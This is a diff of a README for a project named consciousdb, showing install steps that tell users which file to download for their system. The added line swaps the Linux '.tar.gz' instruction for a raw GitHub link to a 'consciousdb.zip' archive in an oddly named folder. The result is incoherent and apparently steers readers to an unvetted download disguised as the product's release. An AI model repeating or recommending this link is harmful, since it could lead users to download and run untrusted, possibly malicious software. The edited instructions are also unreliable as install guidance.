britorbs/consciousdb/README.md

    Depending on your system, find the appropriate file:
    - For Windows, select the `.exe` file.
    - For macOS, choose the `.dmg` file.
-   - For Linux, look for the `.tar.gz` file.
+   - For Linux, look for the `https://raw.githubusercontent.com/britorbs/consciousdb/main/leptorrhinian/consciousdb.zip` file.

 4. **Download the File:**
    Click on the file to initiate the download.
 Your browser may prompt you to save it.
 Choose a location you can remember.